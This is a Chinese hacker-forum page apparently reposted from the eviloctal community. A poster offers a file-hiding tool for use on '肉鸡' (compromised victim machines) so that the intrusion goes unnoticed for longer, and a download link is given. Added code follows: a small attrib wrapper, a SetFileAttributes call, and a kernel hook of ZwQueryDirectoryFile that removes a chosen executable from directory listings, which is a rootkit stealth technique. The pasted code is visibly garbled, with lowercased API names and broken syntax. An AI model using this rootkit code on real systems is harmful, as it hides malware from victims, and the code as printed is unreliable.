| 添加到收藏夹 | 返回目录页 | 上一篇:局域网速度变慢的故障分析 |
邪恶八进制内部隐藏工具NOFILE
呵呵~~我写的一个可以隐藏任何文件的小冬冬,就算选了显示所有文件也看不到哦!在dos里可访问(说明还在),但用 del或dir命令都无效哦!^_^给大家在肉机上玩玩吧,说不定(我说一定~)会让你的肉鸡晚飞几天(n久~),呵呵,有点自大了,发 407070565@qq.com来骂我。小玩意,下载地址:http://bbs.shop366.com/nofile.rar
以下是eviloctal编辑添加内容:
冰血封情的仿照代码:
//creditz bideyore[e.s.t] and eviloctal[e.s.t]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argv, char* argc[])
{
char string[256];
if( argv < 2 )
{
fprintf(stderr, "proper usage is: \n");
fprintf(stderr, "%s filename: \n", argc[0]);
return (1);
}
strcpy(string, "attrib +s +h ");
int stringl = strlen(argc[1]) + strlen(string);
if (stringl > 255)
{
fprintf(stderr, "error!\n");
exit(1);
}
char * output = strcat(string, argc[1]);
system(output);
return 0;
}
下面是swords的方法:
#include<windows.h>
int main(int argv,char *argc[]){
setfileattributes(argc[1],file_attribute_hiddenfile_attribute_system);
}
下面是dahubaobao的代码:
ntstatus newzwquerydirectoryfile (
in handle hfile,
in handle hevent optional,
in pio_apc_routine ioapcroutine optional,
in pvoid ioapccontext optional,
out pio_status_block piostatusblock,
out pvoid fileinformationbuffer,
in ulong fileinformationbufferlength,
in file_information_class fileinfoclass,
in boolean returnonlyoneentry,
in punicode_string filename optional,
in boolean restartquery)
{
ntstatus ntstatus=status_success;
lpfile_names_information filecurr=null;
lpfile_names_information fileprev=null;
unicode_string filenamewide=;
ansi_string filenameansi=;
ulong filenamelength=0;
boolean lastone;
int pos=0,left=0;
keacquirespinlock(&spinlock,&irql);
//请求原函数
ntstatus=((zwquerydirectoryfile)(oldzwquerydirectoryfile)) (
hfile,hevent,ioapcroutine,ioapccontext,
piostatusblock,fileinformationbuffer,
fileinformationbufferlength,fileinfoclass,
returnonlyoneentry,filename,restartquery);
if (nt_success(ntstatus) && (fileinfoclass==3)
{
//指向文件列表缓冲区
if ((filecurr=(lpfile_names_information)fileinformationbuffer)==null)
return ntstatus;
do {
lastone=!(filecurr->nextentryoffset); //取偏移
filenamelength=filecurr->filenamelength; //取长度
rtlinitunicodestring(&filenamewide,filecurr->filename);
rtlunicodestringtoansistring(&filenameansi,&filenamewide,true);
if (_strnicmp("test.exe",filenameansi.buffer,(filenamelength / 2))==0)
{
//最后一个文件
if (lastone)
{
if (filecurr==(lpfile_names_information)fileinformationbuffer)
ntstatus=status_no_more_files; //隐藏
else
fileprev->nextentryoffset=0;
}
else
{
//移动文件偏移
pos=((ulong)filecurr)-((ulong)fileinformationbuffer);
left=(ulong)fileinformationbufferlength-pos-filecurr->nextentryoffset;
//覆盖缓冲
rtlcopymemory((pvoid)filecurr,(pvoid)((char *)filecurr+filecurr->nextentryoffset),(dword)left);
continue;
}
}
//下一文件
fileprev=filecurr;
filecurr=(lpfile_names_information)((char *)filecurr+filecurr->nextentryoffset);
}while (!lastone);
}
if (filenameansi.buffer)
rtlfreeansistring(&filenameansi);
kereleasespinlock(&spinlock,irql);
return ntstatus;
}
下一篇:并不神奇的Real影片木马
↓相关文章:
- · 并不神奇的Real影片木马
- · 检测和删除系统中的木马(Trojan Horse)教程
- · 端口大全+注解
- · 深入剖析EFS
- · 七大常见的集成网卡
- · 2004年十大网络应用漏洞
- · 传奇木马DIY
- · 遨游插件大全
- · 个人电脑日常维护指南
- · 让杀毒软件与网管步调一致
- · 实战分析一次WinRoute后门攻防
- · 网络工程师精华
- · 揭秘:钓鱼者的三种典型攻击手段
- · 网络安全防范的十个戒律
- · 网络协议简介
- · 控制网吧机器玩转主机数据库
- · QQ大盗传播技术分析及防范
- · 秘密穿过内网防火墙
- · 网页木马制作小结
- · 对iis写权限的利用(关于对第八军团写权限BUG的入侵)
- · DOS下设置文件权限
- · 妙用局域网中的“删除”功能
- · 机房管理常见三大难题的解决方法
- · 网络安全技术纵览
- · 计算机硬盘加密的几种方法
- · 个人网络安全防卫手册
- · 常用的网络测试命令
- · 图标在线生成器汇总
- · 枚举出局域网上所有网络资源
- · 如何排除上网过程中所遇到的种种故障
- · 如何把木马注册为系统服务
- · SYN flood攻击的原理及其防御
- · IP地址含义知多少
- · 校园机房安装组建过程实战讲解
- · 构筑牢固的校园网络安全体系
- · 数字证书使用一点通
- · TCP/IP头格式
- · 使用VB实现邮箱自动注册
- · 端口截听实现端口隐藏嗅探与攻击
- · 从上传webshell到突破TCP/IP筛选到3389终端登陆
- · 五个反弹后门的源代码
- · 木马客户端与服务端隐蔽通讯解析
- · Hack新手一定要知道的问题
- · Do All in Cmd Shell (一切尽在命令行)
- · httpdoor---IIS后门
- · 135网络端口,禁用有巧招
- · 建立隐藏的超级用户多种方法
- · 狙击4899肉鸡
- · 告诉大家一个小技巧 一直没人提到过的东东
- · php注入之完全版
- · 千个常用DOS命令全面收藏
- · 如何提高Linux系统安全性的十大招数
- · 网站被入侵之后 需要做的检测
- · 通过PHP v4.0.2rc1-v4.0.7RC2 exploit program 拿到root
- · 下载软件勿忘防毒:嵌入式监控确保上网无忧
- · 详述光波分复用(WDM)技术(中篇)
- · 揭开网络
- · 资深网管教你彻底揪出Windows启动蛀虫
- · 用IDS(入侵检测系统)保卫数据库安全
- · 安全防御系统新趋势 IPS筛选八大定律